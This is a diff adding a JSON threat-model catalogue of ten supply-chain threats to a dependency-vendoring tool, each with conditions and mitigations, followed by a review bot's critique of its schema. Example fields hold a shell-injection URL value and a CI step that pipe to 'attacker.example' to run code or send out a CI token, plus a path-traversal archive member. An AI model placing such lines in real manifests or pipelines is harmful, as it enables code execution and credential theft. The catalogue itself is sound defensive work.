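--- /dev/null
+++ b/UNKNOWN_PATH.json
@@ -0,0 +1,132 @@
+[
+  {
+    "SID": "DFT-01",
+    "target": ["Dataflow"],
+    "description": "Unencrypted transport interception (MITM)",
+    "details": "A network-adjacent attacker intercepts an unencrypted (HTTP or plaintext VCS protocol) data flow and substitutes or reads content in transit. Any tool that accepts non-TLS URLs as declared in a manifest or configuration without enforcement is vulnerable.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.controls.isEncrypted is False and len(target.protocol) > 0",
+    "prerequisites": "A manifest or configuration declares an http:// or other plaintext-protocol URL. The attacker has a network-adjacent position (same LAN, BGP hijack, or compromised DNS resolver).",
+    "mitigations": "Restrict all configured URLs to HTTPS, svn+https://, or SSH. Enforce TLS at the schema-validation layer so plaintext URLs are rejected at parse time. Add integrity hashes for all archive sources so that even a successful MITM is detected.",
+    "example": "A CI runner on a shared cloud network fetches a dependency archive over http://. A co-located attacker intercepts the TCP stream and replaces the archive bytes before they reach the build tool.",
+    "references": "https://capec.mitre.org/data/definitions/94.html, https://cwe.mitre.org/data/definitions/319.html"
+  },
+  {
+    "SID": "DFT-02",
+    "target": ["Dataflow"],
+    "description": "Supply-chain content substitution via server-side compromise",
+    "details": "An attacker who compromises an upstream repository host, archive server, or CDN delivers malicious source code because no cryptographic content hash is verified end-to-end. HTTPS transport only protects against network-layer interception; a server-side compromise is undetectable without out-of-band content verification.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "High",
+    "condition": "target.controls.providesIntegrity is False and len(target.protocol) > 0",
+    "prerequisites": "No integrity hash is present in the manifest for archive sources, or the dependency is a VCS reference (branch or tag) with no hash equivalent. The attacker controls or has compromised an upstream server, registry, or CDN node.",
+    "mitigations": "Require cryptographic integrity hashes for all archive dependencies. Use commit-SHA-pinned VCS dependencies where possible. Verify artifact signatures or SLSA provenance attestations once available.",
+    "example": "A project vendor hosts a tarball on a self-managed server. An attacker who previously compromised the server replaces it with a backdoored version; the build tool downloads and vendors it without detecting the substitution.",
+    "references": "https://capec.mitre.org/data/definitions/186.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-03",
+    "target": ["Process"],
+    "description": "Path traversal in archive or patch extraction",
+    "details": "A malicious archive member or patch file uses relative path sequences (../../) or absolute paths to write files outside the intended extraction directory, potentially overwriting project sources, CI configuration, or secrets.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "Very High",
+    "condition": "target.controls.sanitizesInput is False",
+    "prerequisites": "The archive or patch file is served from an attacker-controlled or compromised upstream source. The extraction process does not resolve and validate destination paths against an approved root directory.",
+    "mitigations": "Resolve every archive member's destination path (following symlinks, e.g. os.path.realpath) and reject any that fall outside the target directory. Validate post-extraction symlinks. Reject patches whose headers reference paths outside the project root.",
+    "example": "A tarball contains the member ../../.github/workflows/publish.yml; without path-traversal checks this overwrites the CI publish workflow, injecting a secret-exfiltration step.",
+    "references": "https://capec.mitre.org/data/definitions/139.html, https://cwe.mitre.org/data/definitions/22.html, CVE-2001-1267"
+  },
+  {
+    "SID": "DFT-04",
+    "target": ["Datastore"],
+    "description": "Sensitive datastore write without content integrity verification",
+    "details": "A sensitive datastore that accepts write operations does not validate the content being written. An attacker with write access to an upstream source can inject malicious content that is consumed by downstream processes without detection.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.storesSensitiveData is True and target.hasWriteAccess is True and target.controls.validatesInput is False",
+    "prerequisites": "The attacker has write access to the upstream source (either through a compromised server or local filesystem access). The consuming process trusts the datastore content without re-validation.",
+    "mitigations": "Validate all inputs on read using a strict schema. Use cryptographic integrity hashes for archive sources to detect substitution at the datastore level. Restrict write access to trusted sources only.",
+    "example": "Fetched source code is written to a vendor directory from an unverified HTTP source. Because no integrity hash is present, injected malicious source passes undetected into the consumer's build.",
+    "references": "https://capec.mitre.org/data/definitions/438.html, https://cwe.mitre.org/data/definitions/345.html"
+  },
+  {
+    "SID": "DFT-05",
+    "target": ["Dataflow"],
+    "description": "Mutable VCS reference enables silent content substitution",
+    "details": "A branch- or tag-pinned VCS dependency is a mutable reference. An upstream maintainer or attacker with repository write access silently changes the content fetched on the next update without any manifest diff, hash mismatch, or alerting mechanism.",
+    "Likelihood Of Attack": "Medium",
+    "severity": "Medium",
+    "condition": "target.controls.isEncrypted is True and target.controls.providesIntegrity is False and len(target.protocol) > 0",
+    "prerequisites": "A manifest pins a dependency to a mutable VCS reference (branch or tag, not a full commit SHA). The upstream repository allows force-pushes to the tracked ref, or an attacker has compromised a maintainer account.",
+    "mitigations": "Pin all VCS dependencies to a full commit SHA in the manifest. Periodically audit upstream refs against previously recorded commit SHAs. Enable signed commits or tag verification where the upstream supports it.",
+    "example": "A dependency is pinned to a release tag v2.1. A maintainer account is compromised; the attacker force-pushes a backdoored commit to that tag. The next dependency update silently vendors the malicious code.",
+    "references": "https://capec.mitre.org/data/definitions/690.html, https://cwe.mitre.org/data/definitions/829.html"
+  },
+  {
+    "SID": "DFT-06",
+    "target": ["Process"],
+    "description": "Command injection via unsanitised subprocess input",
+    "details": "If external commands are invoked via a shell interpreter or with unsanitised user-controlled strings, an attacker who can influence manifest fields or configuration inputs can inject arbitrary shell commands executed with the privileges of the process.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.usesParameterizedInput is False",
+    "prerequisites": "A process invokes external commands using shell=True or string interpolation without strict sanitisation of inputs derived from untrusted sources (manifest, CLI arguments, environment variables).",
+    "mitigations": "Always invoke external programs with shell=False and list-form arguments. Validate all manifest string fields with a strict allowlist regex before use as subprocess arguments.",
+    "example": "A manifest url field contains '; curl attacker.example/exfil | sh'. If the tool passes the URL to a shell command without quoting, the injected command executes in the build environment.",
+    "references": "https://capec.mitre.org/data/definitions/88.html, https://cwe.mitre.org/data/definitions/78.html"
+  },
+  {
+    "SID": "DFT-07",
+    "target": ["Process"],
+    "description": "CI/CD secret exfiltration via supply-chain attack on build environment",
+    "details": "A compromised or malicious step in a CI/CD pipeline (injected via a pull request, a poisoned third-party action or plugin, or a backdoored build dependency) reads secrets from the runner environment and exfiltrates them over an outbound network channel. Without strict egress controls, any code executing in the CI environment can access and transmit secrets.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.isHardened is False",
+    "prerequisites": "A CI pipeline step can run attacker-controlled code (via a malicious PR that modifies pipeline config, a compromised third-party action or plugin, or a backdoored build dependency). Egress from the CI environment is not restricted to an allowlist of known-good hosts.",
+    "mitigations": "Pin all third-party CI actions and plugins to a full commit SHA. Set egress policy to block with an explicit allowlist of required hosts (not just audit). Scope secrets narrowly — avoid passing all secrets to all pipeline jobs. Use isolated environments with mandatory reviewer approval for privileged operations such as publish and deploy.",
+    "example": "A PR modifies pipeline configuration to add a step that runs curl -s $CI_TOKEN | attacker.example/collect. Because egress is only audited (not blocked), the exfiltration succeeds and the attacker obtains a publish credential.",
+    "references": "https://capec.mitre.org/data/definitions/560.html, https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions"
+  },
+  {
+    "SID": "DFT-08",
+    "target": ["Datastore"],
+    "description": "Tampered build artifact suppresses security checks",
+    "details": "An attacker with access to the local build environment (or a compromised CI step) tampers with a non-primary artifact — dependency metadata, patch files, pipeline configuration, or security reports — to suppress security checks or inject malicious behaviour into subsequent pipeline runs.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.controls.validatesInput is False and target.hasWriteAccess is True and target.storesSensitiveData is False",
+    "prerequisites": "The attacker has write access to the local repository or the CI runner's working directory. Downstream processes consume the artifact without re-validation or integrity checking.",
+    "mitigations": "Integrity-verify build artifacts with checksums or signatures. Treat dependency metadata as an append-only audit log where feasible. Protect pipeline configuration files via branch-protection rules and mandatory code review.",
+    "example": "An attacker modifies a dependency metadata cache file to record a known-good hash for a compromised dependency, causing the up-to-date check to report no updates and suppressing the security alert.",
+    "references": "https://capec.mitre.org/data/definitions/268.html, https://cwe.mitre.org/data/definitions/494.html"
+  },
+  {
+    "SID": "DFT-09",
+    "target": ["Process"],
+    "description": "Archive decompression bomb (resource exhaustion)",
+    "details": "A specially crafted archive (zip bomb, tar bomb) expands to an extremely large or deeply nested file tree, causing the extracting process to exhaust disk, memory, or CPU resources. Without size and member-count limits the process hangs or crashes, potentially destabilising the build environment.",
+    "Likelihood Of Attack": "Low",
+    "severity": "Medium",
+    "condition": "target.controls.checksInputBounds is False",
+    "prerequisites": "The archive is fetched from an attacker-controlled or compromised source. The extracting process applies no upper bound on uncompressed size or member count before or during extraction.",
+    "mitigations": "Reject archives whose uncompressed size exceeds a configurable limit (e.g. 500 MB) or whose member count exceeds a configurable ceiling (e.g. 10 000). Apply these limits early in the streaming extraction loop, before writing any bytes to disk.",
+    "example": "A 42 KB zip bomb (42.zip) expands to 4.5 PB of nested zero-byte files; without a member-count limit the extraction loop runs indefinitely, exhausting disk space on the CI runner.",
+    "references": "https://capec.mitre.org/data/definitions/130.html, https://cwe.mitre.org/data/definitions/400.html"
+  },
+  {
+    "SID": "DFT-10",
+    "target": ["Datastore"],
+    "description": "Build or development dependency substitution via compromised registry",
+    "details": "A project's own build and development dependencies are fetched from a public registry without cryptographic hash verification. A compromised registry mirror, BGP-hijacked endpoint, or DNS-spoofed response can substitute a malicious package that runs arbitrary code during installation or build, with access to CI/CD secrets.",
+    "Likelihood Of Attack": "Low",
+    "severity": "High",
+    "condition": "target.controls.providesIntegrity is False and target.hasWriteAccess is False",
+    "prerequisites": "A package registry (e.g. PyPI, npm, RubyGems) or its DNS resolution is compromised. The CI install step does not use hash-pinned dependency files (e.g. --require-hashes, lockfiles with integrity fields).",
+    "mitigations": "Pin all build and development dependencies with cryptographic hashes in a lockfile or requirements file (e.g. pip --require-hashes, package-lock.json integrity fields). Use a private registry mirror with content verification. Prefer install from lockfile over loose version ranges in CI.",
+    "example": "A BGP hijack redirects package registry traffic to a malicious mirror that serves a backdoored build tool. The backdoor runs at install time, exfiltrating the CI publish token before the build begins.",
+    "references": "https://capec.mitre.org/data/definitions/538.html, https://cwe.mitre.org/data/definitions/494.html"
+  }
+]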
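Review bot: DFT-05's `condition` (`isEncrypted is True and providesIntegrity is False and len(target.protocol) > 0`) is a strict subset of DFT-02's (`providesIntegrity is False and len(target.protocol) > 0`), so every dataflow that raises DFT-05 also raises DFT-02, and DFT-05 additionally matches any HTTPS archive download that lacks a hash — not only the mutable branch/tag references its `description` and `prerequisites` describe. None of the attributes used in this file distinguishes a VCS reference from an archive fetch, so either narrow DFT-05 on whatever attribute the model exposes for that (presumably something exists; confirm against the consuming tool), or fold the commit-SHA-pinning guidance into DFT-02's `mitigations` and drop the duplicate. The key `"Likelihood Of Attack"` is the only key with spaces and capitals; if the consuming tool's threat schema dictates that spelling it must stay, otherwise `"likelihoodOfAttack"` would match the rest. `references` is a comma-joined string that every consumer has to split; an array such as `"references": ["https://capec.mitre.org/data/definitions/94.html", "https://cwe.mitre.org/data/definitions/319.html"]` is the cleaner shape if the schema permits it, and it would also keep the bare `CVE-2001-1267` entry in DFT-03 from being mistaken for part of a URL.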